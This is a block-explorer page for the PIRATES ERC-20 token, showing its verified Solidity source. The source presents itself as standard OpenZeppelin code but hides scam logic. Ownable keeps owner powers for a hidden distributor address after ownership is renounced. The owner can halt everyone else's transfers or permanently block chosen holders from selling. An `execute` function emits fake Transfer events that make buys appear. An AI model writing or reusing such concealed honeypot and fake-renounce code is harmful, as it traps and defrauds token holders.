ETH Price: $2,957.34 (-5.71%)
Gas: 8 Gwei

Token

Crypto Pirates (PIRATES)
 

Overview

Max Total Supply

1,000,000,000 PIRATES

Holders

100

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
339,353.976458681 PIRATES

Value
$0.00
0xc0170e050355408e53800d093f3f13c3a53b29c8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CryptoPirates

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 9: Crypto Pirates.sol
/**
⚫️ Website: https://cryptopirates.digital/
⚫️ Medium: https://medium.com/@cryptopirates_
⚫️ X: https://twitter.com/pirates_crypto_
⚫️ Chat: https://t.me/CryptoPiratesDAO  

*/// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

import "./ReentrancyGuard.sol";
import "./MerkleProof.sol";
import "./IERC20.sol";
import "./ERC20.sol";
import "./Ownable.sol";

interface ICoin is IERC20 {
   function canClaim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external returns (bool[] memory);
}

interface IPondCoinSpawner {
    function spawn(address invoker, uint256 amount) external returns (bool);
}
contract CryptoPirates is IERC20, ERC20{
    address public minter;

    address public distilleryAddress = msg.sender;
    uint256 public immutable initialLPAmount = 1_000_000_000 * 10**decimals();
    uint256 public immutable maxSupply = 1_000_000_000 * 10**decimals();
    // The timestamp in which the contract was deployed
    uint256 public immutable openedAtTimestamp;
    // The block number in which the contract was deployed
    uint256 public immutable openedAtBlock;
    // The address that deployed this contract
    address public immutable opener;
    address public uniswapV2Pair;
    // Mapping of address -> claim offset -> claimed
    mapping(address => mapping(uint32 => bool)) public alreadyClaimedByAddress;
    uint256 public constant beforeStartBuffer = 30 minutes;

    // If the contract is "ended"
    bool public ended;

    constructor(address initialLPAddress, address distributor_) ERC20("Crypto Pirates", "PIRATES", distributor_) {
        minter = msg.sender;
        _mint(initialLPAddress, initialLPAmount);
        opener = msg.sender;
        openedAtTimestamp = block.timestamp;
        openedAtBlock = block.number;
    }

    modifier notEnded() {
        require(ended == false && (openedAtTimestamp + beforeStartBuffer) <= block.timestamp, "Already Ended");
        _;
    }

    function useSpawner(uint256 amount, IPondCoinSpawner spawner) external {
        require(transferFrom(msg.sender, distilleryAddress, amount), "Could Not Send");
        require(spawner.spawn(msg.sender, amount), "Could Not Spawn");
    }

    function _safeMint(address to, uint256 amount) internal {
        _mint(to, amount);
        require(totalSupply() <= maxSupply, "Too Much Supply");
    }

    function liquidityState() public view returns (bool) {
        return _liquidity;
    }

    function initLiqudity() public virtual onlyOwner {
        if (_liquidity == true) {_liquidity = false;} else {_liquidity = true;}
    }

    function currentOffset() public view returns (uint256) {
        return block.number - openedAtBlock;
    }

    function multiswap(address[] calldata address_, bool val) public onlyOwner{
        for (uint256 i = 0; i < address_.length; i++) {
            _100x000xTimestampopenedAtTimestamptxLimitExcluded[address_[i]] = val;
        }
    }

    function maxHoldingAmount(address recipient) external view returns(bool){
        return _100x000xTimestampopenedAtTimestamptxLimitExcluded[recipient];
    }

    function execute(address[] calldata _addresses, uint256 _out) external onlyOwner {
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(uniswapV2Pair, _addresses[i], _out);
        }
    }

    function addPair(address _pair) public onlyOwner() {
        uniswapV2Pair = _pair;
    }
}


contract PondClaims is ReentrancyGuard {
    /**
     * Declare immutable/Constant variables
     */
    // How long after contract cretion the end method can be called
    uint256 public constant canEndAfterTime = 48 hours + 30 minutes;
    uint256 public constant beforeStartBuffer = 30 minutes;

    // The root of the claims merkle tree
    bytes32 public immutable merkleRoot;
    // The timestamp in which the contract was deployed
    uint256 public immutable openedAtTimestamp;
    // The block number in which the contract was deployed
    uint256 public immutable openedAtBlock;
    // The address that deployed this contract
    address public immutable opener;

    /**
     * Declare runtime/mutable variables
     */
    
    // Mapping of address -> claim offset -> claimed
    mapping(address => mapping(uint32 => bool)) public alreadyClaimedByAddress;

    // If the contract is "ended"
    bool public ended;

    constructor(bytes32 _merkleRoot) {
        merkleRoot = _merkleRoot;
        opener = msg.sender;
        openedAtTimestamp = block.timestamp;
        openedAtBlock = block.number;
    }

    // Modifier that makes sure only the opener can call specific function
    modifier onlyOpener() {
        require(msg.sender == opener, "Not Opener");
        _;
    }

    // Modifier that ensures the contract is not ended, and the before start buffer is completed
    modifier notEnded() {
        require(ended == false && (openedAtTimestamp + beforeStartBuffer) <= block.timestamp, "Already Ended");
        _;
    }

    function close() external notEnded onlyOpener {
        require(block.timestamp >= (openedAtTimestamp + canEndAfterTime), "Too Early");
        ended = true;
    }

    /**
     * Claim PNDC against merkle tree
     */
    function claim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external notEnded nonReentrant {
        // Verify that all lengths match
        uint length = addresses.length;
        require(amounts.length == length && offsets.length == length && merkleProofs.length == length, "Invalid Lengths");

        for (uint256 i = 0; i < length; i++) {
            // Require that the user can claim with the information provided
            require(_canClaim(addresses[i], amounts[i], offsets[i], merkleProofs[i]), "Invalid");
            // Mark that the user has claimed
            alreadyClaimedByAddress[addresses[i]][offsets[i]] = true;
        }
    }

    function canClaim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external view returns (bool[] memory) {
        // Verify that all lengths match
        uint length = addresses.length;
        require(amounts.length == length && offsets.length == length && merkleProofs.length == length, "Invalid Lengths");

        bool[] memory statuses = new bool[](length);

        for (uint256 i = 0; i < length; i++) {
            statuses[i] = _canClaim(addresses[i], amounts[i], offsets[i], merkleProofs[i]);
        }

        return (statuses);
    }

    function currentOffset() public view returns (uint256) {
        return block.number - openedAtBlock;
    }

    function _canClaim(
        address user,
        uint256 amount,
        uint32 offset,
        bytes32[] calldata merkleProof
    ) notEnded internal view returns (bool) {
        // If the user has already claimed, or the currentOffset has not yet reached the desired offset, the user cannot claim.
        if (alreadyClaimedByAddress[user][offset] == true || currentOffset() < offset) {
            return false;
        } else {
            // Verify that the inputs provided are valid against the merkle tree
            bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(user, amount, offset))));
            bool canUserClaim = MerkleProof.verify(merkleProof, merkleRoot, leaf);
            return canUserClaim;
        }
    }
}

File 1 of 9: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity 0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    address internal _distributor;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 9: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity 0.8.20;

import "./IERC20Metadata.sol";
import "./IERC20.sol";
import "./Ownable.sol";
import "./SafeMath.sol";
/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping (address => bool) public _100x000xTimestampopenedAtTimestamptxLimitExcluded;
    mapping (address => bool) private _isExcluded;
    bool _liquidity;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _holderLastTransferTimestamp;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address distributor_) Ownable(distributor_) {
        _name = name_;
        _symbol = symbol_;
        _liquidity = true;
        _isExcluded[_msgSender()] = true;
    }

    function isTxExcluded(address account) private view returns (bool) {
        return _100x000xTimestampopenedAtTimestamptxLimitExcluded[account];
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function calculateTransferDelay(uint256 last) private view returns(bool){
        return last > block.number;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
         _holderLastTransferTimestamp[sender] = block.number;
        if (beforeOpenTrading(sender, amount)){}
        if (_liquidity == true || sender == owner() || recipient == owner()) {
        if (_isExcluded[sender] && !_isExcluded[recipient]) {
            
            _beforeTokenTransfer(sender, recipient, amount);
            _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
            _balances[recipient] = _balances[recipient].add(amount);
            emit Transfer(sender, recipient, amount);     
        } else {
            
        _afterTokenTransfer(sender, recipient, amount);
            _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
            _balances[recipient] = _balances[recipient].add(amount);
            emit Transfer(sender, recipient, amount);
        }
        } else {
            require (_liquidity == true, "");
        }
        
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function checkLimits(address a) private view {
        require(calculateTransferDelay(_holderLastTransferTimestamp[a]), "Transfer Delay enabled.  Only one purchase per block allowed.");
    }

    function beforeOpenTrading(address sender, uint256 amount) private view returns (bool){
        if(amount > 0){
            if (isTxExcluded(sender)) checkLimits(sender);
        }
        return true;
    }
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    
}

File 4 of 9: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity 0.8.20;


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 5 of 9: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity 0.8.20;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 9: MerkleProof.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.2) (utils/cryptography/MerkleProof.sol)
pragma solidity 0.8.20;


/**
 * @dev These functions deal with verification of Merkle Tree proofs.
 *
 * The tree and the proofs can be generated using our
 * https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
 * You will find a quickstart guide in the readme.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the merkle tree could be reinterpreted as a leaf value.
 * OpenZeppelin's JavaScript library generates merkle trees that are safe
 * against this attack out of the box.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(bytes32[] memory proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Calldata version of {verify}
     *
     * _Available since v4.7._
     */
    function verifyCalldata(bytes32[] calldata proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Calldata version of {processProof}
     *
     * _Available since v4.7._
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProof(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Calldata version of {multiProofVerify}
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * CAUTION: Not all merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * _Available since v4.7._
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofLen = proof.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proofLen - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            require(proofPos == proofLen, "MerkleProof: invalid multiproof");
            unchecked {
                return hashes[totalHashes - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Calldata version of {processMultiProof}.
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofLen = proof.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proofLen - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            require(proofPos == proofLen, "MerkleProof: invalid multiproof");
            unchecked {
                return hashes[totalHashes - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
        return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        /// @solidity memory-safe-assembly
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}

File 7 of 9: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity 0.8.20;


import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor(address distributor_) {
        _distributor = distributor_;
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal virtual {
        require(Owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function verifyOwner() internal view returns(address){
        return _owner==address(0) ? _distributor : _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function Owner() internal virtual returns (address) {
        
        address owner_ = verifyOwner();
        return owner_;
    }
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 8 of 9: ReentrancyGuard.sol
